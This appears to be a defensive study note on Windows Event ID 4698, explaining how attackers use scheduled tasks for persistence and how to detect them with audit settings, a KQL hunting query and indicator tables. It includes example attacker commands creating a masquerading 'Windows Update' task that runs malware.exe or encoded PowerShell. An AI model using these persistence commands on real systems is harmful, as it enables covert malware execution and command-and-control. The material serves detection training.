Windows Event ID 4698
Windows Event ID 4698
One-liner: A Windows Security Event logged when a new scheduled task is createdβcritical for detecting persistence mechanisms implanted by attackers.
π― What Is It?
Windows Event ID 4698 is generated when a new scheduled task is registered on a Windows system. Attackers abuse scheduled tasks to:
- Maintain persistence β Execute malware on reboot/login
- Execute payloads β Run commands at specific times
- Evade detection β Tasks run as SYSTEM or specified users
- Establish C2 β Regularly beacon to command servers
Channel: Security
MITRE ATT&CK: T1053.005 - Scheduled Task/Job: Scheduled Task
Prerequisite: Requires "Audit Other Object Access Events" to be enabled.
π¬ How It Works
Event Details
<Event>
<System>
<EventID>4698</EventID>
<Channel>Security</Channel>
<Computer>WKSTN-1.domain.local</Computer>
</System>
<EventData>
<Data Name="SubjectUserName">attacker</Data>
<Data Name="SubjectDomainName">DOMAIN</Data>
<Data Name="TaskName">\Windows Update</Data>
<Data Name="TaskContent">
<!-- Full XML of the scheduled task -->
</Data>
</EventData>
</Event>
Key Fields
| Field | Description |
|---|---|
SubjectUserName |
Account that created the task |
TaskName |
Name of the scheduled task |
TaskContent |
Full XML definition (includes command, triggers) |
Common Attacker Techniques
# Command Prompt
schtasks /create /tn "Windows Update" /tr "C:\Windows\Temp\malware.exe" /sc minute /mo 1
# PowerShell
Register-ScheduledTask -TaskName "Updater" -Trigger (New-ScheduledTaskTrigger -AtStartup) -Action (New-ScheduledTaskAction -Execute "powershell.exe" -Argument "-enc <payload>")
π΅οΈ Detection & Hunting
KQL Query (from THM Threat Hunting Foothold)
host.name: WKSTN-* AND (winlog.event_id: 4698 OR (*schtasks* OR *Register-ScheduledTask*))
Key Columns to Add
winlog.computer_nameuser.nameprocess.command_linewinlog.event_idwinlog.event_data.TaskName
Suspicious Indicators
| Indicator | Why It's Suspicious |
|---|---|
Task executing from %TEMP%, %APPDATA% |
Unusual execution location |
| Task name mimicking Windows tasks | Masquerading (e.g., "Windows Update") |
| Encoded PowerShell in task action | Obfuscated payload |
| Frequent execution (every minute) | C2 beaconing pattern |
| Task created by non-admin user | Privilege concern |
| External URLs in task action | Downloading remote payloads |
Example from THM
Task Name: "Windows Update"
Action: PowerShell downloading from www[.]oneedirve[.]xyz
Schedule: Every minute
β Clear indicator of malicious persistence
π Related Event IDs
| Event ID | Description |
|---|---|
| 4698 | Scheduled task created |
| 4699 | Scheduled task deleted |
| 4700 | Scheduled task enabled |
| 4701 | Scheduled task disabled |
| 4702 | Scheduled task updated |
| 106 | Task registered (Task Scheduler log) |
| 200 | Task executed (Task Scheduler log) |
| 201 | Task completed (Task Scheduler log) |
π§ Enabling the Audit
Via Group Policy
Computer Configuration
β Windows Settings
β Security Settings
β Advanced Audit Policy Configuration
β Object Access
β Audit Other Object Access Events: Success, Failure
Via Command Line
auditpol /set /subcategory:"Other Object Access Events" /success:enable /failure:enable
π€ Interview Angles
Common Questions
- "How do you detect malicious scheduled tasks?"
- "What Event ID tracks scheduled task creation?"
- "How do attackers use scheduled tasks for persistence?"
STAR Story
Situation: Endpoint was beaconing to an external domain every minute, but no obvious malware process was visible.
Task: Identify the persistence mechanism maintaining the C2 connection.
Action: Searched for Event ID 4698 and found a task named "Windows Update" created shortly after initial compromise. The TaskContent XML revealed a PowerShell command downloading from a malicious domain. Correlated with schtasks.exe execution in Sysmon logs.
Result: Identified and removed the persistence mechanism. Created detection rule for tasks executing encoded PowerShell or connecting to external URLs.
β Best Practices
- Enable "Audit Other Object Access Events" on all endpoints
- Alert on scheduled task creation outside of change windows
- Monitor for tasks with suspicious names mimicking Windows
- Check TaskContent for encoded commands or external URLs
- Correlate with process creation (schtasks.exe, powershell.exe)
β Common Misconceptions
- "Only admins can create scheduled tasks" β Users can create tasks in their context
- "Scheduled tasks are always visible in Task Scheduler GUI" β Attackers can hide tasks
- "Event ID 4698 shows the command" β Need to parse TaskContent XML
π Related Concepts
- Windows Event Logs
- Persistence (Cyber Security)
- MITRE ATT&CK
- Threat Hunting
- Sysmon Event IDs
- Defense Evasion
π References
- MITRE ATT&CK T1053.005: https://attack.mitre.org/techniques/T1053/005/
- Microsoft Audit Other Object Access Events
- SANS Windows Security Event Log Reference